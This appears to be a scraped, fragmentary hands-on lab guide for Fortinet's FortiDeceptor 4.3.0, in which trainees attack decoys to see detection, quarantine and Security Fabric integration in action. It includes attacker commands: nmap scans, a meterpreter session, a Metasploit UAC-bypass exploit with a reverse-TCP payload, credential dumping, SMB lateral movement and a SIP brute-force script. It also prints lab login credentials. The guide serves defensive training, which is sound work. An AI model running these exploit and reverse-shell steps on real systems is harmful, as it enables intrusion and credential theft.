Professional Documents
Culture Documents
FortiDeceptor-4.3.0-Threat Prevention and Detection With FortiDeceptor
FortiDeceptor-4.3.0-Threat Prevention and Detection With FortiDeceptor
with FortiDeceptor
FortiDeceptor 4.3.0 Hands on Labs v3
Introduction
Introduction
FortiDeceptor allows organizations to rapidly create a fabricated deception network that lures attackers into revealing
themselves. FortiDeceptor serves as an early warning system by providing accurate detection that correlates an attacker's
activity details and lateral movement, indicating that a breach has happened. Threat intelligence gathered from the attacker
can be applied automatically to inline security controls to stop attacks before any real damage is done.
Participants who attend this workshop will learn how to:
• Deploy deception hosts to uncover attacker activity
• Use the anti-reconnaissance and anti-exploit engine to correlate events into incidents and campaigns, giving SecOps the
information they need to act upon
• Take action on discovered threat actor activity by integrating with the Fortinet Security Fabric to quarantine compromised
hosts before they can do further damage
The Training Agenda will cover the following items below:
1. FortiDeceptor initial configuration and deploying decoy VMs
2. Attack the network and detect lateral movement
3. Increasing the deception surface by deploying deception lures
4. Integration with the Security Fabric for mitigation automation
• Link: https://<instance-name>.fortidemo.fortinet.com:10443
• Username: fortideceptor
• Password: FortiDeceptor12#
After successful authentication, you can view the portal that will allow you to access the FortiDeceptor lab components.
The SSL-VPN portal supports SSO, so all the devices should be logged in automatically. If you are prompted to provide
your credentials, use your VPN credentials for access.
The VPN user account can support two VPN end-users at the same time.
© Fortinet Inc. All Rights Reserved. 7
1.3 Accessing the FortiDeceptor training environment
• FortiClient
We highly recommend you access the lab over FortiClient. If you
do not have FortiClient, you can download a free trial here:
https://www.fortinet.com/support/product-downloads#vpn
Install the client and add a new connection with the following
parameters:
VPN SSL-VPN
Connection Name FDC
Remote Gateway <instance-name>.fortidemo.fortinet.com
Customize Port 10443
Client Certificate None
Username fortideceptor
Password FortiDeceptor12#
The VPN user account can support two VPN end-users at the
same time. You can access the VPN from your laptop/pc directly
to the FortiDeceptor.
• Lab IPs
FortiDeceptor offers a highly-scalable 3-tier architecture that combines three levels of deception:
• Server/ Endpoint Lures
• Medium Interaction Decoys (IoT/OT)
• High Interaction Decoys
Deception Lures can be deployed using existing infrastructure tools like A/D GPO, MS SCCM, etc.
A single FortiDeceptor Appliance can run 20 Deception VM's that support 480 IP addresses in total. Each IP address
represents a single Decoy.
The Deception VM can be downloaded from the FortiDeceptor marketplace and allows the end-user admin to bring their
own Gold Image and convert it to a Decoy using the FortiDeceptor Decoy Customization wizard.
Act as a bad entity and discover elements of interest on the network segment and
Network Reconnaissance Attacks 15 minutes
use FortiDeceptor to analyze the incidents
Lateral Movement Detection: Expanding the Learn how to expand the deception surface with Lure Deployment packages -
10 minutes
Deception Surface tokens
4
Configure and test the deployment of HoneyDocs tokens and analyze incidents
Lateral Movement Detection: HoneyDocs Lure 10 minutes
reported in FortiDeceptor
Decoy Engagement: Post Exploitation Analyze decoy capture and records of attacker’s activities 10 minutes
5 SQL Deception
6 Tomcat Deception Configure, test and analyze the interaction with SQL, Tomcat and/or SIP Decoy 15 minutes
7 SIP Decoy
11 Outbreak Alerts for Recent Vulnerabilities Configure, test and analyze the interaction with Spring4Shell outbreak Decoy 10 minutes
12 Fabric Integration Configure, test and analyze the remediation using FortiGate integration 10 minutes
13 Decoy Deployment Configure how to deploy Decoys required to complete the labs
At the end of the labs, please follow this steps as outlined in this section of the
14 Cleanup 5 minutes
© Fortinet Inc. All Rights Reserved. 16
Labs
3 FortiDeceptor Initial Configuration
Before we start: PREPARATION
!!!Attention!!! READ THIS CAREFULLY: PREPARATION:
Access the FortiDeceptor web management console via SSL–VPN (https://192.168.1.100). Ignore the fabric login option. In
case you see static data regarding incidents, events and/or lure distribution, please reset the configuration first
Just login to CLI using the same credentials as for the UI login and perform a data purge.
Run data-purge –a
After performing the command, type ‘y’, the FortiDeceptor unit will clean
all data and do a reboot. This will take some time.
© Fortinet Inc. All Rights Reserved. 18
3. FortiDeceptor Management Console: Administrator Tasks
• Exercise: FortiDeceptor management console and configuration
In this exercise, we will familiarize ourselves with the FortiDeceptor management console and apply the initial configuration.
A Deployment Network is a network segment where the Decoy will be deployed. It can be configured as either a VLAN
or a subnet. The deployment network must be configured before the Decoy VM can be deployed.
5. Now we are going to create the deployment network for the Decoy deployment (192.168.2.0/24).
• Click on +Add New Vlan/Subnet.
• Configure the following settings:
Name deploynet1
Interface port2
VLANID 0
Deploy Monitor IP/Mask 192.168.2.100/24
Gateway 192.168.2.1
ARP Protection Uncheck (this is for ARP spoofing/poisoning detection)
Tag any © Fortinet Inc. All Rights Reserved. 20
3. FortiDeceptor Management Console: Administrator Tasks
6. In the latest v4.3, there’s an option to test the deployment network (port2 in this case) to ensure that it’s fit for decoy
deployment. At the moment, this can only be done via CLI:
a. Log onto the FortiDeceptor’s CLI either via CLI icon on the top left of the GUI or ssh directly into the
FortiDeceptor’s CLI
b. Run test-deployment-network -iport2 -m00:00:00:00:00:00
c. You should see a message informing you that The network on port2 is good for decoy deployment
We are now going to switch roles and become the attacker. We are going to do some active reconnaissance and scan for
open ports to find any interesting services. We are then going to try to use these services to infiltrate the network.
Nmap options:
• -F option specifies to scan for the top 100 common ports.
• -sV is used to probe any opens ports to determine their services/version information. The version information can be useful to look up and see if there are
any known vulnerabilities for the service.
• -Pn option disables host discovery using icmp.
You should see an incident with the Attacker IP, 192.168.2.201, Victim IP (192.168.2.x), and Victim Port(s).
FortiDeceptor has the concept of Events, Incidents, and Campaigns.
An Event can be an opening or closing a port, for example. Incidents are made up of connected Events.
Campaigns are then made up of connected Incidents. Here we can see the four events caused by the NMAP scan,
which make up the Incident. The port is opened, a connection is established, a command is executed, and the port is
closed. © Fortinet Inc. All Rights Reserved. 25
4.1 Network Reconnaissance Attacks (before the lateral movement)
An attacker that will detect RDP port (3389) will find the User
and Password by running brute force attack or running an
exploit against the service for getting a remote shell.
FortiDeceptor will detect this attack, and all the attack alerts will be under the incident analysis section (Incident >
Analysis)
Note: Toggle the Show dropdown box to view different events
2. Use following settings to create the Token package and press Save.
3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or through the
SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (Bookmark for 192.168.1.100) using the known
credentials.
a. Go to the Deception Token menu.
b. Download the Deception Lure for the Windows 10 decoy from the windows desktop.
5. Unzip the file. to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or
through the SSL-VPN web portal.
6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. After isntallation of the Tokens verify on FortiDeceptor > Deception > Deception Token > Token Deployment Status
that the workstation has successfully layed the „breadcrumps“. As we use „online“ Tokens you can change the Tokens at
any time and FDC will upload the changes to the workstation.
Go back to the windows desktop and run the file office.exe on the My Documents directory.
You should be able to access the KALI box through a backdoor session to the windows desktop machine called
meterpreter. This allows you to load the attacker framework and get full access to the Windows OS and extract information
such as saved passwords, network, and more.
The Deception Lure expands the attack surface and provides fake information and credentials to the threat actor to deceive
the malicious activities into engaging with a fake asset instead of a real one.
This command will present the infected endpoint local drive and the attached network
drive. The attacker will enter the drives to find sensitive files and learn from the
meterpreter > show_mount files about the endpoint owner (financial, HR, R&D, role, etc).If the attacker
enters the fake network drive, it will lead to a decoy engagement that will generate
an alert
You will notice that you are missing the privileges to get system information. You
have also not enough permissions to read the credential manger to extract usernames
meterpreter > getsystem
and password.
We need to take additional steps…
2. Let’s continue the attack, were we need to gain administrative privileges by running an escalation exploit.
meterpreter > ps –A x64 Show x64 processes – select one of the svchost processes and the PID number.
meterpreter > migrate <PID> Lifts the remote process to an the a x64 process.
Moves the backdoor session to the background to run more command from the
meterpreter > background © Fortinet Inc. All Rights Reserved. 34
Metasploit console.
4.2 Lateral movement Detection: Expanding the attack surface
3. To continue the attack, we need to gain administrative privileged by running a privilege escalation exploit.
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac_sdclt
msf6 exploit (windows/local/bypassuac_sdclt) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit (windows/local/bypassuac_sdclt) > set SESSION 1
msf6 exploit (windows/local/bypassuac_sdclt) > set LHOST 192.168.2.201
msf6 exploit (windows/local/bypassuac_sdclt) > set LPORT 4443
msf6 exploit (windows/local/bypassuac_sdclt) > exploit
After the attack you will end up in the meterpreter console again
Now that the threat actor has dumped the infected endpoint password from the Windows credentials manager, the stolen
credentials will be used for lateral movement.
In this example we got:
Username: Windows10\matthew > SMBUser
Domain: 192.168.2.11 > RHOST
Password: iloveyou > SMBPass
In your case it will be a different login as the decoy credentials are random created.
© Fortinet Inc. All Rights Reserved. 36
4.2 Lateral movement Detection: Expanding the attack surface
5. Stop the Metasploit tool and use the SMB client on the KALI box to access 192.168.2.11 vis SMB using the extracted
credentials.
• Exit Metasploit:
msf6 exploit (windows/local/bypassuac_sdclt) > exit –y
When we connect to the share, it is easy to manipulate the files using available options > For example downloading a file:
smb:\> get Leave_Notice_PTO.docx
In this case, the credentials provide Access to the Windows endpoint and present the existing network shares that the credentials can
access but even in this early stage of the attack, the FortiDeceptor will generate a security alert on network drive access
© Fortinet Inc. All Rights Reserved. 38
4.2 Lateral movement Detection: Expanding the attack surface
Note
In the current 4.3 release we identify a software anomaly with Windows SMB lures
that prevent Incident Analysis logs to be displayed. This will be resolved in the
coming release.
Mode Online
3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or through the
SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (Bookmark for 192.168.1.100) using the known
credentials.
a. Go to the Deception Token menu.
b. Download the Deception Package (token) for the HoneyDocs Lure to the windows desktop.
© Fortinet Inc. All Rights Reserved. 41
4.3 Lateral Movement Detection: HoneyDocs Lure
7. Once the lure successfully deployed, you should be able to notice that there were fake contents created under
Downloads directory. You have to make sure that view hidden files option is checked.
9. Browse to the downloads folder, open any of the pdf. Allow the pop up asking to allow connection.
Note - This is the End of Windows and Linux Decoy use cases, please delete the Win10 and Linux-Decoy decoy.
You should notice service is activated on the default port 3306 as the example below.
By now, you should notice incident was triggered. Browse to Incident->Analysis and you should see multiple
Reconnaissance Events from the Kali Linux machine to the SQL-Decoy.
You may also generate some Interactive Events by connecting to the SQL-Decoy hosted Database. Please use any
generated lure users to connect to the database like below;
fortideceptor@kali:~$ mysql -u <username> -p -h 192.168.2.16 CustomerDB
Once the connection is successful issue multiple database commands (eg ‘show tables;’ or ‘show databases;’)
© Fortinet Inc. All Rights Reserved. 50
5. Probing the SQL Decoy
Browsing back to the FortiDeceptor dashboard-> Incident-> Interaction, you should notice the connection to the MySQL
database and also query executed by the attacker.
Note - This is the End of SQL-Decoy use case, please delete the SQL decoy.
Note - This is the End of Tomcat-Decoy use case, please delete the Tomcat-decoy.
Network Discovery
Discover the network using nmap. From the Kali linux CLI:
fortideceptor@kali:~$ nmap 192.168.2.0/24
The result should list the sip decoy as SIP server in the network.
Edit the users.txt file using the ‘nano’ tool and add the two lures info that you have marked down before.
We took the first two in this example:
When you edit the file, make sure that you don’t leave white spaces or empty lines in the text file.
Run a brute force attack using the sip client script which will use the users:password trying to register to the SIP server.
Issue the command line: python3 sip_clientv1.py 192.168.2.18 5060 users.txt
FortiDeceptor allows you to deploy OT assets using the SCADA3 Decoy. We will use KALI to test the SCADA Decoy.
Please ignore any error messages in the output, the main idea of these commands is the enumeration and verify the host
status.
Modbus values can easily be changed when Access is open. For example:
This is the End of Siemens-S7-200 decoy use case, please delete the Siemens-S7-200 decoy.
Please ignore the returned message and verify the incidents on FortiDeceptor.
This is the End of Siemens-S7-300 decoy use case, please delete the Siemens-S7-300©decoy.
Fortinet Inc. All Rights Reserved. 69
10. Network Attacks: IoT Decoys
10. Network Attacks: IoT Decoys
• Deploy IoT Decoy and make sure it’s up & running as described in sections 13.4 (HP Printer IoT Decoy Deployment) &
13.5 (Cisco Router 2691 IoT Decoy Deployment).
• After successful deployment, the status the “Decoy Status” should be like:
FortiDeceptor allows you to deploy IoT assets using the IoT Decoys such as Cisco router, HP printer and IP camera.You
can access the Cisco decoy using the Telnet/Web interface and try to read/write configuration. We will use KALI to test the
IoT Decoys.
Enumeration Testing using NMAP (require to be run as root user “sudo”):
@kali:~$ sudo nmap –sS –Pn –T5 –vv <CiscoIOS decoy IP / HP Decoy IP>
@kali:~$ sudo snmap -sU -p 161 --script snmp-sysdescr <CiscoIOS decoy IP / HP Decoy IP>
5. If you move to the Incident > MITRE ICS tab, you’d see the exact mappings of the attack
© Fortinet Inc. All Rights Reserved. 73
10. Network Attacks: IoT Decoys
This is the End of IoT decoys use case, please delete HP-Printer and CiscoIOS decoys.
2. Use python to start the script, targeting the outbreak decoy on FortiDeceptor:
@kali (/Downloads/spring4shell-scan)$ spring4shell-scan.py -u https://192.168.2.17
3. Check the Incident > Analysis on FortiDeceptor that the scan was identified and correctly reported.
Name fgtblocker
Block Severity Check all (Low, Medium, High, Critical)
Integrate Method: FGT-REST-API
IP: 192.168.0.2
Port: 443
Username: fortideceptor
Password: FortiDeceptor12#
© Fortinet Inc. All Rights Reserved. 80
12. Fabric Integration
3. Press Save and verify that the Enabled and Ready Status shows a positive connection to FGT
3. To trigger a mitigation action, we need to simulate an attack against one of the Decoys. Please access the KALI BOX
over SSH check that you can reach the internet by pinging Google DNS Servers.
@kali:~$ ping 8.8.8.8
5. Now we use NMAP to run a port scan to trigger the quarantine action for the KALI BOX
@kali:~$ sudo nmap -F -sV 192.168.2.17
7. This status is synced via the Fabric Upstream to FortiGate which will block now Internet connection for that host. Verify
that by pinging Google DNS again and it should no reply. Keep the ping running.
8. Go back to the FortiDeceptor > Fabric > Quarantine Status, select the quarantine host and click the Unblock button
to release the host from Quarantine.
9. This status will be synced to FortiGate and the running ping on the KALI BOX should now start to reply.
TCPlistener Disable
NBNSSpoofSpotter Disable
ICMP Disable
FTP Disable
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.
e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:
Max Keep as is
Enter the IP address range that FortiDeceptor can
IP Ranges configure the Decoy IPaddresses.
For this example, configure as follows: 192.168.2.11
Decoy Interface Configuration examples:
Configuration for 1 Decoy IP Address
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.
Name Linux-Decoy
HTTPS Disable
GIT Disable
ICMP Enable
FTP Disable
Disabled
Reset Decoy (In production, this feature reset the Decoy after
attacker engagement based on specified time.)
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.
e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:
Max Keep as is
Enter the IP address range that FortiDeceptor can
configure the Decoy IPaddresses.
IP Ranges
For this example, configure as follows: 192.168.2.10-
192.168.2.20 Decoy Interface Configuration examples:
Configuration for 11 Decoy IP Addresses (range)
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.
Note: This is an exclusive Fortinet router image, in real deployments, customers need to upload their own images.
• Generate lures
• Login via CLI, using the same credentials as for the UI login and perform a data purge. After performing the
command, type ‘y’, the FortiDeceptor unit will clean all data and do a reboot.
data-purge –a
• Once the files are removed from the Downloads folder, delete zip file.